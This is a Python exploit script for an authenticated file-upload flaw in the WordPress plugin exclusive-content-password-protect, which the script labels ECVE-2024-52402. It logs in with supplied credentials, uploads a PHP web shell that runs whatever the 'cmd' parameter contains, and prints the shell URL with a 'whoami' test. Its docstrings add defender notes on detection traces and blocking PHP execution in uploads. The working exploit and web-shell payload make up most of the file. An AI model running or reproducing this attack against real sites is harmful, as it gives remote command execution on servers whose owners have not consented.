import requests
import argparse
import re
# Nxploit, Khaled ALenazi
# Silence urllib3 warnings. The session built in WordPressExploiter sets
# verify = False, so without this call every request would emit an
# InsecureRequestWarning. Suppressing the warning does not restore any
# protection: server certificates are still not validated, and the WordPress
# credentials posted by login_to_wordpress() are exposed to anyone able to
# intercept the connection.
requests.packages.urllib3.disable_warnings()
class WordPressExploiter:
    """Authenticated file-upload check against one WordPress plugin.

    The class targets the ``exclusive-content-password-protect`` plugin (the
    slug comes from the readme path requested below). It logs in with
    caller-supplied credentials and posts a PHP file to the plugin's admin
    page. The script's ``--help`` text labels the issue "ECVE-2024-52402",
    presumably CVE-2024-52402 -- confirm against the advisory.

    Notes for reviewers and defenders:

    * Every request is sent with certificate verification disabled, so the
      WordPress credentials can be read by an on-path party.
    * ``url`` is concatenated as given; a trailing slash produces ``//`` in
      every request path.
    * Observable traces are a multipart POST to ``wp-admin/admin.php`` that
      carries a ``.php`` filename, a new ``.php`` file under
      ``wp-content/uploads/``, and later GET requests to that file with a
      ``cmd`` query parameter.
    * Denying PHP execution inside the uploads directory neutralises the
      uploaded file even where the plugin is still installed.
    """

    def __init__(self, url, username, password):
        # The session is created first; it does not depend on the other fields.
        self.session = self._initialize_session()
        self.user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
        self.url = url
        self.username = username
        self.password = password

    def _initialize_session(self):
        """Return a ``requests.Session`` with TLS certificate checks turned off."""
        http = requests.Session()
        # No certificate validation: self-signed lab hosts work, but so does
        # any interception of the traffic, credentials included.
        http.verify = False
        return http

    def get_plugin_version(self):
        """Return the plugin's ``Stable tag`` from its public readme, or None.

        Only a three-part ``x.y.z`` tag matches the pattern; a tag written in
        another form, a non-200 response, or a missing readme yields None.
        A world-readable ``readme.txt`` is what discloses the installed
        version here, so blocking access to it removes this fingerprint.
        """
        target = f"{self.url}/wp-content/plugins/exclusive-content-password-protect/readme.txt"
        reply = self.session.get(target, headers={"User-Agent": self.user_agent}, verify=False)
        if reply.status_code != 200:
            return None
        found = re.search(r"Stable tag:\s*(\d+\.\d+\.\d+)", reply.text)
        return found.group(1) if found else None

    def is_potentially_vulnerable(self, version):
        """Return True for every ``version``; no comparison is performed.

        The method is a placeholder for a future version check. Because it
        never returns False, a detected version does not gate the upload.
        """
        return True

    def login_to_wordpress(self):
        """Post the stored credentials to ``wp-login.php``.

        Returns True when the session holds a cookie whose name contains
        ``wordpress_logged_in``. The response body and status are not
        inspected. The account's role is not checked here either, so a
        successful login does not by itself show that the admin page used
        later is reachable.
        """
        form = {
            "log": self.username,
            "pwd": self.password,
            "rememberme": "forever",
            "wp-submit": "Log In",
        }
        self.session.post(
            self.url + "/wp-login.php",
            data=form,
            headers={"User-Agent": self.user_agent},
            verify=False,
        )
        for jar_entry in self.session.cookies:
            if "wordpress_logged_in" in jar_entry.name:
                return True
        return False

    def upload_web_shell(self):
        """Post a PHP file to the plugin admin page and return its expected URL.

        The file is sent as the multipart field ``userfile``. Any HTTP 200
        response is treated as success; the method does not confirm that the
        file exists at the returned location, so a returned URL may be a
        false positive. Returns None for any other status code.

        Detection: the request is an authenticated multipart POST to
        ``wp-admin/admin.php`` with a ``page`` parameter naming the plugin
        file and an upload whose filename ends in ``.php``. File-integrity
        monitoring on ``wp-content/uploads/`` and a web-server rule that
        refuses to execute PHP there both cover the outcome.
        """
        endpoint = f"{self.url}/wp-admin/admin.php?page=1.1.0%2Fcontent-password-protect.php"
        name_on_disk = "nxploit.php"
        payload = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"
        upload = {"userfile": (name_on_disk, payload, "application/x-php")}
        request_headers = {"User-Agent": self.user_agent, "Referer": endpoint}
        reply = self.session.post(endpoint, files=upload, headers=request_headers, verify=False)
        if reply.status_code != 200:
            return None
        return f"{self.url}/wp-content/uploads/{name_on_disk}"
def main():
    """Parse the command line and run the version, login and upload steps.

    Flow: read the plugin version, log in with the supplied credentials,
    post the file, then print the resulting URL. The "not vulnerable" exit
    is unreachable in practice because ``is_potentially_vulnerable`` returns
    True for every input, and an undetected version does not stop the run
    either, so the upload is attempted whenever the login succeeds.
    """
    cli = argparse.ArgumentParser(description="Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi ")
    cli.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
    cli.add_argument("-un", "--username", required=True, help="WordPress username")
    cli.add_argument("-p", "--password", required=True, help="WordPress password")
    opts = cli.parse_args()

    exploiter = WordPressExploiter(opts.url, opts.username, opts.password)

    detected = exploiter.get_plugin_version()
    if not detected:
        # A missing version is reported but is not treated as a stop condition.
        print("[X] Could not determine the plugin version. Proceeding with exploitation attempt...")
    else:
        print(f"[+] Plugin version detected: {detected}")
        if not exploiter.is_potentially_vulnerable(detected):
            print("[X] Site is not vulnerable. Exiting.")
            return
        print("[!] Attempting exploitation...")

    if not exploiter.login_to_wordpress():
        print("[X] Failed to log in.")
        return
    print("[+] Logged in successfully.")

    shell_url = exploiter.upload_web_shell()
    if not shell_url:
        print("[X] Exploit failed. Check manually.")
        return
    # The URL is derived from an HTTP 200 on the upload request, not from a
    # check that the file is present, so this message can be a false positive.
    print(f"[!] Exploit completed! Web Shell uploaded: {shell_url}")
    print(f"[*] Test with: {shell_url}?cmd=whoami")
# Run the command-line workflow only when the file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()